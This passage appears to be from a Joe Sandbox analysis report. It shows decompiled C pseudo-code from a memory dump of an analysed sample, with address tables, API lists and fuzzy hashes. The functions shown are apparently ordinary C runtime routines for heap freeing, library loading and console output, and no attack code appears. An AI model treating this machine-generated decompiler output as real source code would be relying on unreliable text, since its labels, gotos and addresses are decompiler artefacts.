                                                												goto L14;
                                                											} else {
                                                												 *0xc993dc = E00C22F42(1, 4);
                                                												E00C22F9F(_t110);
                                                												_t158 = _t158 + 0xc;
                                                												__eflags =  *0xc993dc - _t110; // 0x0
                                                												if(__eflags == 0) {
                                                													goto L39;
                                                												} else {
                                                													goto L14;
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t111 = 0;
                                                										L40:
                                                										E00C22F9F(_t141);
                                                										_t62 = _t111;
                                                										goto L41;
                                                									}
                                                								} else {
                                                									__eflags =  *0xc993dc - _t110; // 0x0
                                                									if(__eflags == 0) {
                                                										goto L9;
                                                									} else {
                                                										__eflags = L00C20D73();
                                                										if(__eflags == 0) {
                                                											goto L38;
                                                										} else {
                                                											L60();
                                                											goto L14;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t109 = E00C1DA28(_t163);
                                                					 *_t109 = 0x16;
                                                					_t62 = _t109 | 0xffffffff;
                                                					L41:
                                                					return _t62;
                                                				}
                                                				L63:
                                                			}










































                                                0x00c2b052
                                                0x00c2b055
                                                0x00c2b057
                                                0x00c2b05b
                                                0x00c2b05e
                                                0x00c2b060
                                                0x00c2b075
                                                0x00c2b07a
                                                0x00c2b07c
                                                0x00c2b081
                                                0x00c2b086
                                                0x00c2b088
                                                0x00c2b269
                                                0x00c2b26e
                                                0x00000000
                                                0x00c2b08e
                                                0x00c2b08e
                                                0x00c2b090
                                                0x00000000
                                                0x00c2b096
                                                0x00c2b099
                                                0x00c2b09c
                                                0x00c2b0a1
                                                0x00c2b0a3
                                                0x00c2b0a9
                                                0x00c2b126
                                                0x00c2b126
                                                0x00c2b12b
                                                0x00c2b12e
                                                0x00c2b130
                                                0x00000000
                                                0x00c2b136
                                                0x00c2b13d
                                                0x00c2b142
                                                0x00c2b147
                                                0x00c2b14a
                                                0x00c2b14c
                                                0x00c2b19d
                                                0x00c2b19d
                                                0x00c2b1a0
                                                0x00000000
                                                0x00c2b1a6
                                                0x00c2b1a6
                                                0x00c2b1a8
                                                0x00c2b1ab
                                                0x00c2b1ab
                                                0x00c2b1ae
                                                0x00c2b1b0
                                                0x00000000
                                                0x00c2b1b6
                                                0x00c2b1b6
                                                0x00c2b1bc
                                                0x00000000
                                                0x00c2b1c2
                                                0x00c2b1cc
                                                0x00c2b1cf
                                                0x00c2b1d4
                                                0x00c2b1d7
                                                0x00c2b1da
                                                0x00c2b1dc
                                                0x00000000
                                                0x00c2b1e2
                                                0x00c2b1e2
                                                0x00c2b1e5
                                                0x00c2b1e7
                                                0x00c2b1ea
                                                0x00000000
                                                0x00c2b1ea
                                                0x00c2b1dc
                                                0x00c2b1bc
                                                0x00c2b1b0
                                                0x00c2b14e
                                                0x00c2b14e
                                                0x00c2b150
                                                0x00000000
                                                0x00c2b152
                                                0x00c2b155
                                                0x00c2b15b
                                                0x00c2b15e
                                                0x00c2b161
                                                0x00c2b196
                                                0x00c2b198
                                                0x00c2b163
                                                0x00c2b163
                                                0x00c2b170
                                                0x00c2b170
                                                0x00c2b173
                                                0x00000000
                                                0x00000000
                                                0x00c2b16c
                                                0x00c2b16f
                                                0x00c2b16f
                                                0x00c2b16f
                                                0x00c2b17f
                                                0x00c2b182
                                                0x00c2b187
                                                0x00c2b18a
                                                0x00c2b18d
                                                0x00c2b18f
                                                0x00c2b1ee
                                                0x00c2b1ee
                                                0x00c2b1ee
                                                0x00c2b18f
                                                0x00c2b1f3
                                                0x00c2b1f6
                                                0x00000000
                                                0x00c2b1f8
                                                0x00c2b1f8
                                                0x00c2b1fb
                                                0x00c2b1fb
                                                0x00c2b1fd
                                                0x00c2b1fe
                                                0x00c2b1fe
                                                0x00c2b20a
                                                0x00c2b212
                                                0x00c2b215
                                                0x00c2b216
                                                0x00c2b218
                                                0x00c2b260
                                                0x00c2b261
                                                0x00000000
                                                0x00c2b21a
                                                0x00c2b221
                                                0x00c2b226
                                                0x00c2b229
                                                0x00c2b22b
                                                0x00c2b285
                                                0x00c2b286
                                                0x00c2b287
                                                0x00c2b288
                                                0x00c2b289
                                                0x00c2b28a
                                                0x00c2b28f
                                                0x00c2b292
                                                0x00c2b296
                                                0x00c2b297
                                                0x00c2b29a
                                                0x00c2b29c
                                                0x00c2b2a3
                                                0x00c2b2a5
                                                0x00c2b2a7
                                                0x00c2b2a9
                                                0x00c2b2ab
                                                0x00c2b2ab
                                                0x00c2b2ae
                                                0x00c2b2af
                                                0x00c2b2af
                                                0x00c2b2ab
                                                0x00c2b2b5
                                                0x00c2b2c0
                                                0x00c2b2c3
                                                0x00c2b2c4
                                                0x00c2b2c6
                                                0x00c2b32e
                                                0x00c2b32e
                                                0x00000000
                                                0x00c2b2c8
                                                0x00c2b2c8
                                                0x00c2b2ca
                                                0x00c2b2cc
                                                0x00c2b31e
                                                0x00c2b320
                                                0x00c2b326
                                                0x00000000
                                                0x00c2b2ce
                                                0x00c2b2ce
                                                0x00c2b2d1
                                                0x00c2b2d1
                                                0x00c2b2d3
                                                0x00c2b2d3
                                                0x00c2b2d3
                                                0x00c2b2d6
                                                0x00c2b2d6
                                                0x00c2b2d8
                                                0x00c2b2d9
                                                0x00c2b2d9
                                                0x00c2b2e1
                                                0x00c2b2e5
                                                0x00c2b2ef
                                                0x00c2b2f2
                                                0x00c2b2f7
                                                0x00c2b2fa
                                                0x00c2b2fe
                                                0x00000000
                                                0x00c2b300
                                                0x00c2b308
                                                0x00c2b30d
                                                0x00c2b310
                                                0x00c2b312
                                                0x00c2b333
                                                0x00c2b335
                                                0x00c2b336
                                                0x00c2b337
                                                0x00c2b338
                                                0x00c2b339
                                                0x00c2b33a
                                                0x00c2b33f
                                                0x00c2b340
                                                0x00c2b345
                                                0x00c2b34b
                                                0x00c2b34d
                                                0x00c2b34e
                                                0x00c2b354
                                                0x00000000
                                                0x00c2b354
                                                0x00c2b359
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2b312
                                                0x00000000
                                                0x00c2b314
                                                0x00c2b314
                                                0x00c2b317
                                                0x00c2b319
                                                0x00c2b319
                                                0x00000000
                                                0x00c2b31d
                                                0x00c2b2cc
                                                0x00c2b29e
                                                0x00c2b29e
                                                0x00c2b29e
                                                0x00c2b2a0
                                                0x00c2b2a2
                                                0x00c2b2a2
                                                0x00c2b22d
                                                0x00c2b23e
                                                0x00c2b242
                                                0x00c2b24e
                                                0x00c2b250
                                                0x00c2b252
                                                0x00c2b257
                                                0x00c2b257
                                                0x00c2b25a
                                                0x00c2b25a
                                                0x00000000
                                                0x00c2b250
                                                0x00c2b22b
                                                0x00c2b218
                                                0x00c2b1f6
                                                0x00c2b150
                                                0x00c2b14c
                                                0x00c2b0ab
                                                0x00c2b0ab
                                                0x00c2b0ae
                                                0x00c2b0cc
                                                0x00c2b0cc
                                                0x00c2b0cf
                                                0x00c2b0e2
                                                0x00c2b0e7
                                                0x00c2b0ec
                                                0x00c2b0ef
                                                0x00c2b0f5
                                                0x00c2b274
                                                0x00c2b274
                                                0x00c2b274
                                                0x00000000
                                                0x00c2b0fb
                                                0x00c2b0fb
                                                0x00c2b101
                                                0x00000000
                                                0x00c2b103
                                                0x00c2b10d
                                                0x00c2b112
                                                0x00c2b117
                                                0x00c2b11a
                                                0x00c2b120
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2b120
                                                0x00c2b101
                                                0x00c2b0d1
                                                0x00c2b0d1
                                                0x00c2b277
                                                0x00c2b278
                                                0x00c2b27f
                                                0x00000000
                                                0x00c2b281
                                                0x00c2b0b0
                                                0x00c2b0b0
                                                0x00c2b0b6
                                                0x00000000
                                                0x00c2b0b8
                                                0x00c2b0bd
                                                0x00c2b0bf
                                                0x00000000
                                                0x00c2b0c5
                                                0x00c2b0c5
                                                0x00000000
                                                0x00c2b0c5
                                                0x00c2b0bf
                                                0x00c2b0b6
                                                0x00c2b0ae
                                                0x00c2b0a9
                                                0x00c2b090
                                                0x00c2b062
                                                0x00c2b062
                                                0x00c2b067
                                                0x00c2b06d
                                                0x00c2b282
                                                0x00c2b284
                                                0x00c2b284
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 3409252457-0
                                                • Opcode ID: 3a782eedfdeb23b3e7cba5351bd2d05c23a87246338cdf246b0ae7bd29d65260
                                                • Instruction ID: a611b0f6f69231335a3c455066f3e94bd91411dc760f648f3012e1ac177c098c
                                                • Opcode Fuzzy Hash: 3a782eedfdeb23b3e7cba5351bd2d05c23a87246338cdf246b0ae7bd29d65260
                                                • Instruction Fuzzy Hash: 8451D371904335EFDB20AFB9B891A6D7BB4EF01350F14426EE520975A2DB719E40EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2540A(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                				signed int* _v8;
                                                				void** _t12;
                                                				void* _t16;
                                                				void* _t18;
                                                				signed int _t22;
                                                				WCHAR* _t23;
                                                				void** _t26;
                                                				signed int* _t29;
                                                				void* _t32;
                                                				void* _t34;
                                                
                                                				_t29 = _a4;
                                                				while(_t29 != _a8) {
                                                					_t22 =  *_t29;
                                                					_t12 = 0xc99650 + _t22 * 4;
                                                					_t32 =  *_t12;
                                                					_v8 = _t12;
                                                					if(_t32 == 0) {
                                                						_t23 =  *(0xc37d10 + _t22 * 4);
                                                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                						if(_t32 != 0) {
                                                							L12:
                                                							_t26 = _v8;
                                                							 *_t26 = _t32;
                                                							if( *_t26 != 0) {
                                                								FreeLibrary(_t32);
                                                							}
                                                							L14:
                                                							if(_t32 != 0) {
                                                								_t16 = _t32;
                                                								L18:
                                                								return _t16;
                                                							}
                                                							L15:
                                                							_t29 =  &(_t29[1]);
                                                							continue;
                                                						}
                                                						_t18 = GetLastError();
                                                						if(_t18 != 0x57) {
                                                							L9:
                                                							_t32 = 0;
                                                							L10:
                                                							if(_t32 != 0) {
                                                								goto L12;
                                                							}
                                                							 *_v8 = _t18 | 0xffffffff;
                                                							goto L15;
                                                						}
                                                						_t18 = E00C22F08(_t23, L"api-ms-", 7);
                                                						_t34 = _t34 + 0xc;
                                                						if(_t18 == 0) {
                                                							goto L9;
                                                						}
                                                						_t18 = E00C22F08(_t23, L"ext-ms-", 7);
                                                						_t34 = _t34 + 0xc;
                                                						if(_t18 == 0) {
                                                							goto L9;
                                                						}
                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                						_t32 = _t18;
                                                						goto L10;
                                                					}
                                                					if(_t32 == 0xffffffff) {
                                                						goto L15;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t16 = 0;
                                                				goto L18;
                                                			}













                                                0x00c25413
                                                0x00c254bd
                                                0x00c2541b
                                                0x00c2541d
                                                0x00c25424
                                                0x00c25426
                                                0x00c2542c
                                                0x00c25439
                                                0x00c2544e
                                                0x00c25452
                                                0x00c254a4
                                                0x00c254a4
                                                0x00c254a9
                                                0x00c254ad
                                                0x00c254b0
                                                0x00c254b0
                                                0x00c254b6
                                                0x00c254b8
                                                0x00c254cd
                                                0x00c254c8
                                                0x00c254cc
                                                0x00c254cc
                                                0x00c254ba
                                                0x00c254ba
                                                0x00000000
                                                0x00c254ba
                                                0x00c25454
                                                0x00c2545d
                                                0x00c25494
                                                0x00c25494
                                                0x00c25496
                                                0x00c25498
                                                0x00000000
                                                0x00000000
                                                0x00c254a0
                                                0x00000000
                                                0x00c254a0
                                                0x00c25467
                                                0x00c2546c
                                                0x00c25471
                                                0x00000000
                                                0x00000000
                                                0x00c2547b
                                                0x00c25480
                                                0x00c25485
                                                0x00000000
                                                0x00000000
                                                0x00c2548a
                                                0x00c25490
                                                0x00000000
                                                0x00c25490
                                                0x00c25431
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c25437
                                                0x00c254c6
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: 5bd0f1cfb6eb684c99361cd9722e279e62e88037290253028a10c9fab147efca
                                                • Instruction ID: bd53fca78e1f87da98ac942ffcffb8c2800037393e2fde343b178d7b4742a578
                                                • Opcode Fuzzy Hash: 5bd0f1cfb6eb684c99361cd9722e279e62e88037290253028a10c9fab147efca
                                                • Instruction Fuzzy Hash: B721B772E11B30BBCB21AB25BC45B2FB7589F41766F250520FD19AB691D634EE40C5E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2C06F(intOrPtr _a4) {
                                                				void* _t18;
                                                
                                                				_t45 = _a4;
                                                				if(_a4 != 0) {
                                                					E00C2BDBB(_t45, 7);
                                                					E00C2BDBB(_t45 + 0x1c, 7);
                                                					E00C2BDBB(_t45 + 0x38, 0xc);
                                                					E00C2BDBB(_t45 + 0x68, 0xc);
                                                					E00C2BDBB(_t45 + 0x98, 2);
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0xa0)));
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0xa4)));
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0xa8)));
                                                					E00C2BDBB(_t45 + 0xb4, 7);
                                                					E00C2BDBB(_t45 + 0xd0, 7);
                                                					E00C2BDBB(_t45 + 0xec, 0xc);
                                                					E00C2BDBB(_t45 + 0x11c, 0xc);
                                                					E00C2BDBB(_t45 + 0x14c, 2);
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0x154)));
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0x158)));
                                                					E00C22F9F( *((intOrPtr*)(_t45 + 0x15c)));
                                                					return E00C22F9F( *((intOrPtr*)(_t45 + 0x160)));
                                                				}
                                                				return _t18;
                                                			}




                                                0x00c2c075
                                                0x00c2c07a
                                                0x00c2c083
                                                0x00c2c08e
                                                0x00c2c099
                                                0x00c2c0a4
                                                0x00c2c0b2
                                                0x00c2c0bd
                                                0x00c2c0c8
                                                0x00c2c0d3
                                                0x00c2c0e1
                                                0x00c2c0ef
                                                0x00c2c100
                                                0x00c2c10e
                                                0x00c2c11c
                                                0x00c2c127
                                                0x00c2c132
                                                0x00c2c13d
                                                0x00000000
                                                0x00c2c14d
                                                0x00c2c152

                                                APIs
                                                  • Part of subcall function 00C2BDBB: _free.LIBCMT ref: 00C2BDE0
                                                • _free.LIBCMT ref: 00C2C0BD
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                • _free.LIBCMT ref: 00C2C0C8
                                                • _free.LIBCMT ref: 00C2C0D3
                                                • _free.LIBCMT ref: 00C2C127
                                                • _free.LIBCMT ref: 00C2C132
                                                • _free.LIBCMT ref: 00C2C13D
                                                • _free.LIBCMT ref: 00C2C148
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: e3d2b3928468af89511693c538b58909739d92c4d8d8f1e866e98dce4adbb58f
                                                • Instruction ID: a82005308ac2c0c5c47fe79a6e6ad21abae38a7e98db8a2871324551c2c44821
                                                • Opcode Fuzzy Hash: e3d2b3928468af89511693c538b58909739d92c4d8d8f1e866e98dce4adbb58f
                                                • Instruction Fuzzy Hash: E3113071540B24BAD620FBF0EC47FCB77ACAF04700F804915B29DA69AADB75B914B750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00C26BB0(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v23;
                                                				char _v24;
                                                				void _v32;
                                                				signed int _v33;
                                                				signed char _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				char _v51;
                                                				void _v52;
                                                				long _v56;
                                                				char _v60;
                                                				intOrPtr _v68;
                                                				char _v72;
                                                				struct _OVERLAPPED* _v76;
                                                				signed char _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				long _v100;
                                                				signed char* _v104;
                                                				signed char* _v108;
                                                				void* _v112;
                                                				intOrPtr _v116;
                                                				char _v120;
                                                				int _v124;
                                                				intOrPtr _v128;
                                                				struct _OVERLAPPED* _v132;
                                                				struct _OVERLAPPED* _v136;
                                                				struct _OVERLAPPED* _v140;
                                                				struct _OVERLAPPED* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t170;
                                                				signed int _t172;
                                                				int _t178;
                                                				intOrPtr _t183;
                                                				intOrPtr _t186;
                                                				void* _t188;
                                                				void* _t190;
                                                				long _t193;
                                                				void _t198;
                                                				signed char* _t202;
                                                				void* _t206;
                                                				struct _OVERLAPPED* _t211;
                                                				void* _t220;
                                                				long _t224;
                                                				intOrPtr _t225;
                                                				char _t227;
                                                				void* _t237;
                                                				signed int _t242;
                                                				intOrPtr _t245;
                                                				signed int _t248;
                                                				signed int _t249;
                                                				signed int _t251;
                                                				intOrPtr _t253;
                                                				void* _t259;
                                                				intOrPtr _t260;
                                                				signed int _t261;
                                                				signed char _t264;
                                                				intOrPtr _t267;
                                                				signed char* _t269;
                                                				signed int _t272;
                                                				signed int _t273;
                                                				signed int _t277;
                                                				signed int _t278;
                                                				intOrPtr _t279;
                                                				signed int _t280;
                                                				struct _OVERLAPPED* _t282;
                                                				struct _OVERLAPPED* _t284;
                                                				signed int _t285;
                                                				void* _t286;
                                                				void* _t287;
                                                
                                                				_t170 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t170 ^ _t285;
                                                				_t172 = _a8;
                                                				_t264 = _t172 >> 6;
                                                				_t242 = (_t172 & 0x0000003f) * 0x38;
                                                				_t269 = _a12;
                                                				_v108 = _t269;
                                                				_v80 = _t264;
                                                				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xc99448 + _t264 * 4)) + 0x18));
                                                				_v44 = _t242;
                                                				_v96 = _a16 + _t269;
                                                				_t178 = GetConsoleOutputCP();
                                                				_t241 = 0;
                                                				_v124 = _t178;
                                                				E00C1BDEE( &_v72, _t264, 0);
                                                				_t273 = 0;
                                                				_v92 = 0;
                                                				_v88 = 0;
                                                				_v84 = 0;
                                                				_t245 =  *((intOrPtr*)(_v68 + 8));
                                                				_v128 = _t245;
                                                				_v104 = _t269;
                                                				if(_t269 >= _v96) {
                                                					L48:
                                                					__eflags = _v60 - _t241;
                                                				} else {
                                                					while(1) {
                                                						_t248 = _v44;
                                                						_v51 =  *_t269;
                                                						_v76 = _t241;
                                                						_v40 = 1;
                                                						_t186 =  *((intOrPtr*)(0xc99448 + _v80 * 4));
                                                						_v48 = _t186;
                                                						if(_t245 != 0xfde9) {
                                                							goto L19;
                                                						}
                                                						_t211 = _t241;
                                                						_t267 = _v48 + 0x2e + _t248;
                                                						_v116 = _t267;
                                                						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
                                                							_t211 =  &(_t211->Internal);
                                                							if(_t211 < 5) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_t264 = _v96 - _t269;
                                                						_v40 = _t211;
                                                						if(_t211 <= 0) {
                                                							_t72 = ( *_t269 & 0x000000ff) + 0xc42950; // 0x0
                                                							_t253 =  *_t72 + 1;
                                                							_v48 = _t253;
                                                							__eflags = _t253 - _t264;
                                                							if(_t253 > _t264) {
                                                								__eflags = _t264;
                                                								if(_t264 <= 0) {
                                                									goto L40;
                                                								} else {
                                                									_t278 = _v44;
                                                									do {
                                                										 *((char*)( *((intOrPtr*)(0xc99448 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
                                                										_t241 =  &(_t241->Internal);
                                                										__eflags = _t241 - _t264;
                                                									} while (_t241 < _t264);
                                                									goto L39;
                                                								}
                                                							} else {
                                                								_v144 = _t241;
                                                								__eflags = _t253 - 4;
                                                								_v140 = _t241;
                                                								_v56 = _t269;
                                                								_v40 = (_t253 == 4) + 1;
                                                								_t220 = E00C2E004( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
                                                								_t287 = _t286 + 0x10;
                                                								__eflags = _t220 - 0xffffffff;
                                                								if(_t220 == 0xffffffff) {
                                                									goto L48;
                                                								} else {
                                                									_t279 = _v48;
                                                									goto L18;
                                                								}
                                                							}
                                                						} else {
                                                							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xc42950)) + 1;
                                                							_v56 = _t224;
                                                							_t225 = _t224 - _v40;
                                                							_v48 = _t225;
                                                							if(_t225 > _t264) {
                                                								__eflags = _t264;
                                                								if(_t264 > 0) {
                                                									_t280 = _t248;
                                                									do {
                                                										_t227 =  *((intOrPtr*)(_t241 + _t269));
                                                										_t259 =  *((intOrPtr*)(0xc99448 + _v80 * 4)) + _t280 + _t241;
                                                										_t241 =  &(_t241->Internal);
                                                										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
                                                										_t280 = _v44;
                                                										__eflags = _t241 - _t264;
                                                									} while (_t241 < _t264);
                                                									L39:
                                                									_t273 = _v88;
                                                								}
                                                								L40:
                                                								_t277 = _t273 + _t264;
                                                								__eflags = _t277;
                                                								L41:
                                                								__eflags = _v60;
                                                								_v88 = _t277;
                                                							} else {
                                                								_t264 = _v40;
                                                								_t282 = _t241;
                                                								_t260 = _v116;
                                                								do {
                                                									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
                                                									_t282 =  &(_t282->Internal);
                                                								} while (_t282 < _t264);
                                                								_t283 = _v48;
                                                								_t261 = _v44;
                                                								if(_v48 > 0) {
                                                									E00C18460( &_v16 + _t264, _t269, _t283);
                                                									_t261 = _v44;
                                                									_t286 = _t286 + 0xc;
                                                									_t264 = _v40;
                                                								}
                                                								_t272 = _v80;
                                                								_t284 = _t241;
                                                								do {
                                                									 *( *((intOrPtr*)(0xc99448 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
                                                									_t284 =  &(_t284->Internal);
                                                								} while (_t284 < _t264);
                                                								_t269 = _v104;
                                                								_t279 = _v48;
                                                								_v120 =  &_v16;
                                                								_v136 = _t241;
                                                								_v132 = _t241;
                                                								_v40 = (_v56 == 4) + 1;
                                                								_t237 = E00C2E004( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
                                                								_t287 = _t286 + 0x10;
                                                								if(_t237 == 0xffffffff) {
                                                									goto L48;
                                                								} else {
                                                									L18:
                                                									_t269 = _t269 - 1 + _t279;
                                                									L27:
                                                									_t269 =  &(_t269[1]);
                                                									_v104 = _t269;
                                                									_t193 = E00C29B81(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
                                                									_t286 = _t287 + 0x20;
                                                									_v56 = _t193;
                                                									if(_t193 == 0) {
                                                										goto L48;
                                                									} else {
                                                										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
                                                											L47:
                                                											_v92 = GetLastError();
                                                											goto L48;
                                                										} else {
                                                											_t273 = _v84 - _v108 + _t269;
                                                											_v88 = _t273;
                                                											if(_v100 < _v56) {
                                                												goto L48;
                                                											} else {
                                                												if(_v51 != 0xa) {
                                                													L34:
                                                													if(_t269 >= _v96) {
                                                														goto L48;
                                                													} else {
                                                														_t245 = _v128;
                                                														continue;
                                                													}
                                                												} else {
                                                													_t198 = 0xd;
                                                													_v52 = _t198;
                                                													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
                                                														goto L47;
                                                													} else {
                                                														if(_v100 < 1) {
                                                															goto L48;
                                                														} else {
                                                															_v84 = _v84 + 1;
                                                															_t273 = _t273 + 1;
                                                															_v88 = _t273;
                                                															goto L34;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L49;
                                                						L19:
                                                						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
                                                						__eflags = _t264 & 0x00000004;
                                                						if((_t264 & 0x00000004) == 0) {
                                                							_v33 =  *_t269;
                                                							_t188 = E00C1F3E9(_t264);
                                                							_t249 = _v33 & 0x000000ff;
                                                							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
                                                							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
                                                								_push(1);
                                                								_push(_t269);
                                                								goto L26;
                                                							} else {
                                                								_t202 =  &(_t269[1]);
                                                								_v56 = _t202;
                                                								__eflags = _t202 - _v96;
                                                								if(_t202 >= _v96) {
                                                									_t264 = _v80;
                                                									_t251 = _v44;
                                                									_t241 = _v33;
                                                									 *((char*)(_t251 +  *((intOrPtr*)(0xc99448 + _t264 * 4)) + 0x2e)) = _v33;
                                                									 *(_t251 +  *((intOrPtr*)(0xc99448 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xc99448 + _t264 * 4)) + 0x2d) | 0x00000004;
                                                									_t277 = _t273 + 1;
                                                									goto L41;
                                                								} else {
                                                									_t206 = E00C23193( &_v76, _t269, 2);
                                                									_t287 = _t286 + 0xc;
                                                									__eflags = _t206 - 0xffffffff;
                                                									if(_t206 == 0xffffffff) {
                                                										goto L48;
                                                									} else {
                                                										_t269 = _v56;
                                                										goto L27;
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							_t264 = _t264 & 0x000000fb;
                                                							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
                                                							_v23 =  *_t269;
                                                							_push(2);
                                                							 *(_t248 + _v48 + 0x2d) = _t264;
                                                							_push( &_v24);
                                                							L26:
                                                							_push( &_v76);
                                                							_t190 = E00C23193();
                                                							_t287 = _t286 + 0xc;
                                                							__eflags = _t190 - 0xffffffff;
                                                							if(_t190 == 0xffffffff) {
                                                								goto L48;
                                                							} else {
                                                								goto L27;
                                                							}
                                                						}
                                                						goto L49;
                                                					}
                                                				}
                                                				L49:
                                                				if(__eflags != 0) {
                                                					_t183 = _v72;
                                                					_t165 = _t183 + 0x350;
                                                					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
                                                					__eflags =  *_t165;
                                                				}
                                                				__eflags = _v8 ^ _t285;
                                                				asm("movsd");
                                                				asm("movsd");
                                                				asm("movsd");
                                                				return E00C17193(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
                                                			}















































































                                                0x00c26bbb
                                                0x00c26bc2
                                                0x00c26bc5
                                                0x00c26bcd
                                                0x00c26bd0
                                                0x00c26bdd
                                                0x00c26be0
                                                0x00c26be3
                                                0x00c26bea
